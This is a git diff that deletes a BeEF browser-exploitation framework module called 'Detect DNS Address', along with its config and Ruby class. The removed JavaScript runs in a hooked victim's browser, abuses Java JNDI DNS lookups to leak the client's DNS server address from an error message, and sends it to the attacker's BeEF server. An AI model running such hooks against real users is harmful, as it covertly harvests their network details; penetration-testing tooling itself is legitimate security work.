diff --git a/modules/network/detect_dns_address/command.js b/modules/network/detect_dns_address/command.js deleted file mode 100644 index ab6c7849e..000000000 --- a/modules/network/detect_dns_address/command.js +++ /dev/null @@ -1,70 +0,0 @@ -// -// Copyright 2011 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// -beef.execute(function() { - - var command_timeout = "<%= @command_timeout %>"; - var Packz = undefined; - var internal_counter = 0; - - content = ""; - $j('body').append(content); - - function checkDns() { - - var result = ""; - - try { - var env = new Packages.java.util.Hashtable(); - env.put("java.naming.factory.initial", "com.sun.jndi.dns.DnsContextFactory"); - env.put("java.naming.provider.url", "dns://"); - var ctx = new Packages.javax.naming.directory.InitialDirContext(env); - var attrs = ctx.getAttributes("localhost",['*']); - } catch(e) { - var d=""; - if (typeof e != "string") d=e.message; else d=e.toString(); - var re=new RegExp("java.net.SocketPermission.([^:]*)"); - var g=re.exec(d); - result = g[1]; - } - - return(result); - } - - function waituntilok() { - - try { - var output = checkDns(); - - if (output != null) { - beef.net.send('<%= @command_url %>', <%= @command_id %>, "dns_address="+output); - $j('#beefdns').detach(); - return; - } else throw("command results haven't been returned yet"); - } catch (e) { - - internal_counter++; - if (internal_counter > command_timeout) { - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=time out'); - $j('#beefdns').detach(); - return; - } - setTimeout(function() {waituntilok()},1000); - } - } - - waituntilok(); - -}); diff --git a/modules/network/detect_dns_address/config.yaml b/modules/network/detect_dns_address/config.yaml deleted file mode 100644 index fa0c3aac4..000000000 --- a/modules/network/detect_dns_address/config.yaml +++ /dev/null @@ -1,27 +0,0 @@ -# -# Copyright 2011 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# -beef: - module: - detect_dns_address: - enable: true - category: "Network" - name: "Detect DNS Address" - description: "Detects the client's DNS address using Java." - authors: ["bcoles"] - target: - working: "FF" - user_notify: "IE" - not_working: ["S", "O", "C"] diff --git a/modules/network/detect_dns_address/doNothing.class b/modules/network/detect_dns_address/doNothing.class deleted file mode 100644 index 7e67f8fe8..000000000 Binary files a/modules/network/detect_dns_address/doNothing.class and /dev/null differ diff --git a/modules/network/detect_dns_address/module.rb b/modules/network/detect_dns_address/module.rb deleted file mode 100644 index d9f78c971..000000000 --- a/modules/network/detect_dns_address/module.rb +++ /dev/null @@ -1,46 +0,0 @@ -# -# Copyright 2011 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# -# Uses the Packages.javax.naming package with DNS of "dns://" -# Technique discovered by Stefano Di Paola from Minded Security Research Labs -# Advisory: http://blog.mindedsecurity.com/2010/10/get-internal-network-information-with.html - -class Detect_dns_address < BeEF::Core::Command - - def pre_send - # Mount the doNothing.class on /doNothing.class - # Unsure if there's something we can add here to check if the module was already mounted? - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/network/detect_dns_address/doNothing.class','/doNothing','class') - end - - def self.options - return [ - {'name'=>'command_timeout', 'ui_label'=>'Timeout (s)', 'value'=>'30'} - ] - end - - def callback - content = {} - content['dns_address'] = @datastore['dns_address'] if not @datastore['dns_address'].nil? - content['fail'] = @datastore['fail'] if not @datastore['fail'].nil? - content['fail'] = 'could not detect dns address' if content.empty? - save content - - # Unmount the class now, it's no longer required. - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/doNothing.class'); - - end - -end